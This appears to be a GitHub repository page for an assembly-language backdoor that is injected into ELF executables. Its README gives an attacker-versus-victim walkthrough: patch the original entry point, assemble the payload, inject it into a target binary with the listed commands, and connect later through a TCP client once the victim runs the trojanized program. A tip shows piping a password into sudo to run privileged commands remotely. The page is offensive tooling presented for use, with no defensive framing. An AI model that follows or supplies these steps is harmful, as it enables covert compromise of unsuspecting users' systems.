Skip to content

simple elf_backdoor written in pure x86_64 assembly language

Notifications You must be signed in to change notification settings

gbdngb12/elf_backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

54 Commits
 
 
 
 
 
 
 
 

Repository files navigation

elf_backdoor

It is elf backdoor written in pure assembly language that works in x86_64

Usage

Attacker

First, in the backdoor/backdoor.s file,

you need to modify the statement push 0x4049a0 ; jump to entrypoint to the original entry point of the target binary.

backdoor

$ gcc elfinject.c -o elfinject -lelf
$ nasm -f bin backdoor.s -o backdoor.bin
$ ./elfinject elftarget backdoor.bin ".injected" 0x800000 0

backdoor_client

$ python3 tcpClient.py

victim

If the victim downloads or acquires the file in any manner.

$ ./elftarget

The victim successfully uses the original program without any issues, but later, attackers exploit backdoors.

Demo

backdoor

backdoor

backdoor_client

client

Tips

How to use sudo

$ python3 tcpClient
echo "password" | sudo -S <command>

About

simple elf_backdoor written in pure x86_64 assembly language

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published